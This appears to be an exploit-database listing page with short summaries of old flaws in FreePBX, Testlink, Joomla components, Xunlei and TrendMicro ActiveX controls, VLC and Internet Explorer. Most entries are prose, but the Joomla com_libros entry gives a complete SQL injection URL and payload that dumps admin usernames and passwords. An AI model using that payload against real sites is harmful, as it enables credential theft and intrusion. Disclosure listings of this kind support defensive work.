
Explore Vulnerabilities


Explore all Exploits:

Permanent Cross-Site Scripting (XSS) in FreePBX 2.5.x – 2.6.0

A permanent Cross-Site Scripting vulnerability was found in FreePBX 2.5.x and 2.6. The application fails to sanitize user-supplied input, and the vulnerability can be triggered by any logged-in user who is able to add an Inbound Route.

Multiple Directory Traversal Vulnerabilities in Testlink TestManagement and Execution System

Multiple directory traversal vulnerabilities have been found in Testlink (http://www.teamst.org/), a popular and acclaimed free, open source test management tool written in PHP. The issue discovered can only be exploited with an authenticated session. This directory traversal vulnerability is present in the file /testlink/lib/usermanagement/userInfo.php & In Testlink 1.8.4 these issues can be exploited by setting the variables "editUser" & "locale" like below with an HTTP POST request.

Joomla Component com_libros SQL Injection Vulnerability

Admin login credentials can be obtained. http://server/index.php?option=com_libros&task=detail&Itemid=27&id=[EXPLOIT] Exploit: null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+jos_users--

Joomla Component com_prime

A directory traversal vulnerability exists in Joomla Component com_prime, which allows an attacker to read arbitrary files on the server. This is due to the application not properly sanitizing user-supplied input to the 'lang' parameter. An attacker can leverage this vulnerability to read sensitive files on the server, such as the /etc/passwd file.

Xunlei XPPlayer ActiveX Remote Exec 0day POC

This exploit allows remote attackers to execute arbitrary code on vulnerable installations of Xunlei XPPlayer ActiveX. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Xunlei XPPlayer ActiveX control, which listens by default on TCP port 8888. By sending a specially crafted packet to this port, an attacker can gain arbitrary code execution under the context of the user.

VLC vs 0.6.8 [b][c][d][a] .ASS file buffer overflow exploit (win32 universal)

This exploit targets a buffer overflow vulnerability in VLC media player version 0.6.8. It allows an attacker to execute arbitrary code on the vulnerable system by sending a specially crafted .ASS file. The exploit has been tested on Windows XP SP2 and works every time.

TrendMicro Web-Deployment ActiveX Remote Exec 0day POC

This is a proof-of-concept exploit for a remote execution vulnerability in TrendMicro Web-Deployment ActiveX. The vulnerability allows an attacker to execute arbitrary code on the target system by sending a specially crafted request to the vulnerable ActiveX control. The exploit was tested on Windows XP SP3 with Internet Explorer 6.

Microsoft Internet Explorer Object Tag Memory Corruption Vulnerability

This vulnerability exists in Microsoft Internet Explorer due to a memory corruption issue when processing an object tag. An attacker can exploit this vulnerability by convincing a user to open a malicious web page containing a specially crafted object tag. Successful exploitation could result in arbitrary code execution in the context of the current user.

Recent Exploits: